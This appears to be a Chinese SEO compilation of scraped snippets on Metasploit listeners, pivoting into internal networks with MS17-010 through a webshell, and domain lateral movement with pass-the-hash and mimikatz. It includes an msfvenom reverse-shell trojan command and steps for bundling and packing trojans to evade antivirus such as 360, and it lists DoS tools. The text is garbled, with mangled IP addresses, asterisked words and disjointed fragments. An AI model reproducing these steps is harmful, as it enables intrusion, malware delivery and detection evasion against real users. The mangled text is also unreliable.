首页 云主机 正文

Metasploit云主机监听-metasploit监听模块

云主机 3

本篇文章给大家分享Metasploit云主机监听,以及metasploit监听模块对应的知识点,希望对各位有所帮助。

文章信息一览:

利用公网Msf+MS17010跨网段攻击内网

攻击端:公网ubuntu系统,集成Metasploit框架(msf)。目标端:内网win7系统,IP地址为1916107。途径:利用内网中另一台win2003系统的webshell作为跳板。公网主机操作:生成msf木马并监听1234端口。使用webshell上传并执行生成的shell.exe文件。获取目标机内网1916106的shell权限。

在公网主机执行 msf,生成 msf 木马并监听于 1234 端口。利用已有 Webshell,上传并执行生成的 shell.exe 文件,成功获取目标机内网 1916106 的 shell。确定当前路由,添加新路由 19160/24 到公网主机,通过该路由访问内网。扫描目标主机,发现可用 ms17010 漏洞进行攻击。

Metasploit云主机监听-metasploit监听模块
(图片来源网络,侵删)

在msf成功接收session之后,添加路由 然后使用ms17-010相关的模块进行探测是否存在该漏洞。尝试利用 LHOST配置为公网IP 可以看到success。漏洞是可以利用的,但始终没有session。不知道什么原因。 参考资料: 利用公网Msf+MS17010跨网段攻击内网 笔者在本地搭建环境,也是同样的结果。

内网域渗透分析(实战总结)

1、在渗透过程中,通过反向socks代理(如meterpreter的portfwd功能或frp)避免防火墙拦截,如设置`portfwd add/`指令。同时,CS通过创建反向socks通道连接web服务器,实现内网穿透。

2、域渗透的核心思路是利用域成员主机作为跳板,定位域控制器IP及域管理员账号,利用域管理员可以登录域中所有成员主机的特性,通过从域成员主机内存中dump出域管理员密码,最终拿下域控制器并渗透整个内网。域渗透常用指令包括获取域控制器IP、域管理员账号信息、所有域用户列表等。

Metasploit云主机监听-metasploit监听模块
(图片来源网络,侵删)

3、域渗透流程包括构建域环境,收集主机信息,内网信息收集,利用漏洞进行攻击,如MySQL弱口令,哈希传递攻击,通过mimikatz获取密码,提升权限。

4、总结:渗透测试实战中的信息收集是一个系统而细致的过程,需要结合主动和被动信息收集方式,运用多种手段和工具,同时注重敏感信息的查找和网站架构的分析。通过参加实战训练和培训课程,可以不断提升渗透测试技能,为网络安全保驾护航。

5、或 AES128 方式进行传递的 Pass The Key 方法也逐渐成为攻击者关注的目标。总结来说,Pass The Hash 攻击在内网渗透中扮演着关键角色。它允许攻击者在域环境下利用相同的账号密码横向移动,无需花费时间破解密码哈希。通过掌握和利用哈希值传递技术,攻击者能够在不留下明显痕迹的情况下进行深入渗透。

6、内网渗透中,首先配置内网cobalt strike上线,使用frp反向代理实现。使用shell iponfig收集信息,测试与其他域内主机的连通性,查看计算机名,发现无法找到域内其他主机。

Metasploit实现木马生成、捆绑及免杀

本次实验我们将学习如何通过Metasploit的msfvenom命令来生成木马、捆绑木马以及对木马进行免杀处理。木马文件风险高,想要免杀需要用shellter工具捆绑下,但是处理后木马文件还是能被360检测到拦截下来。

使用 Kali Linux,通过以下命令生成木马:msfvenom -p windows/meterpreter/reverse_tcp LHOST=19169128 LPORT=4444 -f exe -o flash.exe 配置木马文件和网站:创建 index.html 和 flash.exe 文件,并移动到 /var/www/html 目录下。开启 Apache 服务器,使用 msfconsole 实现监听。

为了进一步提高木马的隐蔽性,可以进行加壳操作。勾选检测选项后,点击“保护”即可生成加壳木马。在经过多次杀软检测后,组合免杀策略得以生效,成功绕过防火墙和360等杀软。将Cobalt Strike木***话传递到Metasploit(Msf)的过程相对简单。

常见的网络攻击工具

常见的网络攻击工具包括Nmap、Metasploit、Wireshark和John the Ripper。Nmap是一款开源的网络扫描工具,用于网络探测和安全审计。它能够扫描目标主机的开放端口、服务、操作系统等信息,帮助攻击者识别潜在的安全漏洞。攻击者可以利用Nmap的扫描结果,进一步制定针对性的攻击策略,如利用已知的漏洞进行攻击。

卢瓦(LOWLIC):这款工具因其易用性而广受欢迎,被用于执行DOS(拒绝服务)攻击。它能够通过发送UDP、TCP或HTTP请求淹没目标服务器,使得服务器无法处理正常的请求。 XOIC:XOIC是一款功能强大的DOS攻击工具,允许用户根据选择的端口和协议对目标服务器发起攻击。开发者声称XOIC在多个方面优于卢瓦。

漏洞扫描器 一个漏洞扫描器是用来快速检查已知弱点,网络上的计算机的工具。黑客通常也使用端口扫描仪。它们检查指定计算机上的哪些端口“打开”或可用于访问计算机,并且有时会检测该端口上侦听的程序或服务以及其版本号。(防火墙通过限制对端口和机器的访问来防止入侵者侵入计算机,但它们仍然可以绕开。

常见的网络攻击工具有DoS和DDoS攻击、MITM攻击、勒索软件攻击等。DoS和DDoS攻击 DoS是Denial of Service的简称,即拒绝服务。DDos全称Distributed Denial of Service,分布式拒绝服务攻击。仅就DoS和DDoS网络攻击而言,目标只是中断目标服务的有效性。

网络安全世界中,黑客常常施展六种狡猾的攻击手法。首先,虚拟专用网络(***s)是他们获取安全通道的工具,用于远程访问和规避审查,同时也是黑客突破地理限制的手段。其次,加密技术则是他们的盾牌,用于混淆数据,确保只有目标接收者能够解读,常在金融交易中扮演关键角色,也是近期黑客新闻的高频词。

DDOSIM-Layer是使用C++编写,运行于Linux系统上的DDoS工具,通过模拟控制多个僵尸主机执行攻击。所有僵尸主机创建完整的TCP连接至目标服务器,使用随机IP地址。DDoS攻击工具种类繁多,本文分析的仅是其中一些常见的。未来,工具将更加智能化,攻击者的目标主要为非法利益,如敲诈勒索、信息盗取、恶意竞争等。

漏洞考古之永恒之蓝原理及利用

1、漏洞原理与攻击步骤 攻击者利用永恒之蓝漏洞的过程,主要包括:客户端发送SMB negport请求,服务器确认可用协议;客户端进行用户认证,服务器响应或拒绝;接着,客户端请求连接特定资源,服务器确认或拒绝;最后,成功连接后,攻击者可以读写文件或执行恶意操作。

2、SMB协议的工作原理是,当一个设备需要访问另一个设备的共享资源时,它会通过SMB发送请求。永恒之蓝漏洞主要存在于SMBv1和SMBv2的某些版本中,允许攻击者利用一个名为“Eternal Blue”的漏洞,通过发送特定的恶意数据包,触发系统缓冲区溢出,进而获取权限或控制系统。

3、永恒之蓝(Eternal Blue),一种利用Windows系统的SMB协议漏洞的恶意软件,其对系统进行最高权限获取,从而实现对被攻击计算机的控制。

浅谈CS免杀和使用

1、常见的免杀方式包括资源修改和加壳组合。使用前辈的免杀木马脚本,虽然木马已经被加入病毒库,但通过资源修改仍然可以绕过部分杀软。将修改后的木马文件和第三方资源信息一起拖入应用Restorator,保存更改。然而,仍然需要更进一步的手段来确保免杀效果。为了进一步提高木马的隐蔽性,可以进行加壳操作。

2、通常的免杀方式包括资源修改与加壳组合使用。使用前辈提供的免杀木马脚本,通过应用Restorator将资源信息从一个程序(如网易云)***到木马上,然后保存。尽管进行了资源修改,木马仍可能被杀软查杀。为解决这一问题,对木马进行加壳,通过设置检测选项并点击“保护”生成加壳后的木马。

3、在Cobaltstrike生成木马时,首先创建***,选择“攻击-》生成后门-》windows executable”,保存生成木马。然而,CS生成的木马很容易被杀软识别,因此需要进行免杀操作。常见免杀方式包括修改文件属性、资源修改与加壳等。通过使用免杀木马脚本和应用Restorator工具,将资源信息***到木马中,实现常见免杀。

关于Metasploit云主机监听,以及metasploit监听模块的相关信息分享结束,感谢你的耐心阅读,希望对你有所帮助。

扫码二维码